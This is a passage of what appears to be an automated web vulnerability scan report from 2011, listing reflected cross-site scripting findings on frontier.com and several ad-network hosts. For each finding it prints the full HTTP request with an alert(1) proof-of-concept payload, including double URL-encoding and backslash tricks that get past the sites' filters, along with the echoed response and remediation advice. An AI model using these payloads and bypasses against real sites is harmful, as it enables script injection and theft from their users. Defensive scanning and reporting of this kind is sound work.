The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images7327a%2527%253balert%25281%2529%252f%252f2dd01931fc3/2011promo/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images7327a';alert(1)//2dd01931fc3/2011promo/bg-grey.jpg');//]]>
...[SNIP]...

2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 611ec%2527%253balert%25281%2529%252f%252f635909959d4 was submitted in the REST URL parameter 2. This input was echoed as 611ec';alert(1)//635909959d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/2011promo611ec%2527%253balert%25281%2529%252f%252f635909959d4/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo611ec';alert(1)//635909959d4/bg-grey.jpg');//]]>
...[SNIP]...

2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde47%2527%253balert%25281%2529%252f%252fcff2b560950 was submitted in the REST URL parameter 3. This input was echoed as cde47';alert(1)//cff2b560950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/2011promo/bg-grey.jpgcde47%2527%253balert%25281%2529%252f%252fcff2b560950 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpgcde47';alert(1)//cff2b560950');//]]>
...[SNIP]...

2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de098'%3balert(1)//67697fc3289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de098';alert(1)//67697fc3289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/2011promo/bg-grey.jpg?de098'%3balert(1)//67697fc3289=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpg?de098';alert(1)//67697fc3289=1');//]]>
...[SNIP]...

2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866b2'%3b64e0a78ddc1 was submitted in the REST URL parameter 1. This input was echoed as 866b2';64e0a78ddc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop866b2'%3b64e0a78ddc1/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop866b2';64e0a78ddc1/Login.aspx');//]]>
...[SNIP]...

2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 was submitted in the REST URL parameter 2. This input was echoed as eb7ff';alert(1)//4743277aa69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Shop/Login.aspxeb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Shop/Login.aspxeb7ff';alert(1)//4743277aa69');//]]>
...[SNIP]...

2.40. http://frontier.com/winwin1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965 was submitted in the REST URL parameter 1. This input was echoed as d97a2';alert(1)//5a9a39ab965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /winwin1d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/winwin1d97a2';alert(1)//5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110');//]]>
...[SNIP]...

2.41. http://frontier.com/winwin1 [mkwid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the mkwid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cd51'%3balert(1)//f8a5646b3ab was submitted in the mkwid parameter. This input was echoed as 4cd51';alert(1)//f8a5646b3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ04cd51'%3balert(1)//f8a5646b3ab&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ04cd51';alert(1)//f8a5646b3ab&pcrid=14742396110');//]]>
...[SNIP]...

2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2473b'%3balert(1)//867912431c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2473b';alert(1)//867912431c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110&2473b'%3balert(1)//867912431c1=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=14742396110&2473b';alert(1)//867912431c1=1');//]]>
...[SNIP]...

2.43. http://frontier.com/winwin1 [pcrid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the pcrid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59505'%3balert(1)//f0a2d5e98b9 was submitted in the pcrid parameter. This input was echoed as 59505';alert(1)//f0a2d5e98b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=1474239611059505'%3balert(1)//f0a2d5e98b9 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=1474239611059505';alert(1)//f0a2d5e98b9');//]]>
...[SNIP]...

2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /WebAnalysis/APP/GenerateCode.ashx

Issue detail

The value of the lc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 434e0\'%3balert(1)//c3ce629f4e0 was submitted in the lc parameter. This input was echoed as 434e0\\';alert(1)//c3ce629f4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=game&code=119282623&lc=en434e0\'%3balert(1)//c3ce629f4e0&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3416
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:50:58 GMT
Connection: close

try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...
ents,eVar1,eVar2,prop1,eVar7,eVar11,eVar10,prop10,eVar6"; s.linkTrackEvents = "event1"; s.dc = 112; s.eVar10 = s_account; s.prop10 = s_account; s.campaign = '' ; s.prop1 = 'WebAnalysis' ; s.prop2 = 'en434e0\\';alert(1)//c3ce629f4e0' ; s.prop3 = '/WebAnalysis/APP/GenerateCode.ashx' ; GameCatalog.WebAnalysis.SiteTracking['game']= { 'pageName' : 'GamePage - [Mystery Age Imperial Staff]' , 'products' : ';Mystery Age Imperial Staff'
...[SNIP]...

2.45. http://ib.adnxs.com/seg [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c810'%3balert(1)//01b28dbf622 was submitted in the redir parameter. This input was echoed as 2c810';alert(1)//01b28dbf622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seg?add=155746&redir=${SEG_IDS}2c810'%3balert(1)//01b28dbf622&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-18; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0uQsu#'0AK.2BD)8JE^N(7nZs3ht</s2t.vO)!%C9MfYBDro4%$RXj*VXG`FnPjma[wF*_)<q[y1WP9e8pC8`#5O?0/><2+:3wu0usM@nf1dht<oQOZgDK+C#1JIHqN@hU=SVr%o_v%pV$Tn'!-5)NXI#wq; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:31 GMT
Content-Length: 484

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c
...[SNIP]...
<scr'+'ipt type="text/javascript" src="${SEG_IDS}2c810';alert(1)//01b28dbf622">
...[SNIP]...

2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fa3a"%3balert(1)//ba80aca61be was submitted in the mpck parameter. This input was echoed as 5fa3a";alert(1)//ba80aca61be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

